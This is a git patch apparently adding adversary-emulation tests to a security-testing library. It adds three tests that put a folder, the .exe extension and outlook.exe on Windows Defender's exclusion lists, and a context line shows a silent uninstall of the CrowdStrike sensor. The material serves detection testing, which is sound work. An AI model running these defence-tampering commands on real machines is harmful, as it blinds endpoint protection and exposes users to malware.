From 67e3776d7c1b8fc78b23cbcbccaf8a71251f94ac Mon Sep 17 00:00:00 2001 From: san-gwea <57334373+san-gwea@users.noreply.github.com> Date: Thu, 16 Jul 2020 20:09:55 -0500 Subject: [PATCH] T1562 exclude objects (#1131) * added a test for evading detection by excluding path from scanning * added tests for evading process and extesnion scanning * fixed syntax * description correction Co-authored-by: Carrie Roberts --- atomics/T1562.001/T1562.001.yaml | 64 +++++++++++++++++++++++++++++++- 1 file changed, 63 insertions(+), 1 deletion(-) diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 5899294d..491fd054 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml @@ -367,4 +367,66 @@ atomic_tests: command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} name: powershell elevation_required: true - +- name: Tamper with Windows Defender Evade Scanning -Folder + description: | + Malware can exclude a specific path from being scanned and evading detection. + Upon successul execution, the file provided should be on the list of excluded path. + To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath + supported_platforms: + - windows + input_arguments: + excluded_folder: + description: This folder will be excluded from scanning + type: String + default: C:\Temp + executor: + command: |- + $excludedpath= "#{excluded_folder}" + Add-MpPreference -ExclusionPath $excludedpath + cleanup_command: | + $excludedpath= "#{excluded_folder}" + Remove-MpPreference -ExclusionPath $excludedpath + name: powershell + elevation_required: true +- name: Tamper with Windows Defender Evade Scanning -Extension + description: | + Malware can exclude specific extensions from being scanned and evading detection. + Upon successful execution, the extension(s) should be on the list of excluded extensions. + To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension. + supported_platforms: + - windows + input_arguments: + excluded_exts: + description: A list of extension to exclude from scanning + type: string + default: .exe + executor: + command: |- + $excludedExts= "#{excluded_exts}" + Add-MpPreference -ExclusionExtension $excludedExts + cleanup_command: | + $excludedExts= "#{excluded_exts}" + Remove-MpPreference -ExclusionExtension $excludedExts + name: powershell + elevation_required: true +- name: Tamper with Windows Defender Evade Scanning -Process + description: | + Malware can exclude specific processes from being scanned and evading detection. + Upon successful execution, the process(es) should be on the list of excluded processes. + To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess." + supported_platforms: + - windows + input_arguments: + excluded_process: + description: A list of processes to exclude from scanning + type: string + default: outlook.exe + executor: + command: |- + $excludedProcess = "#{excluded_process}" + Add-MpPreference -ExclusionProcess $excludedProcess + cleanup_command: | + $excludedProcess = "#{excluded_process}" + Remove-MpPreference -ExclusionProcess $excludedProcess + name: powershell + elevation_required: true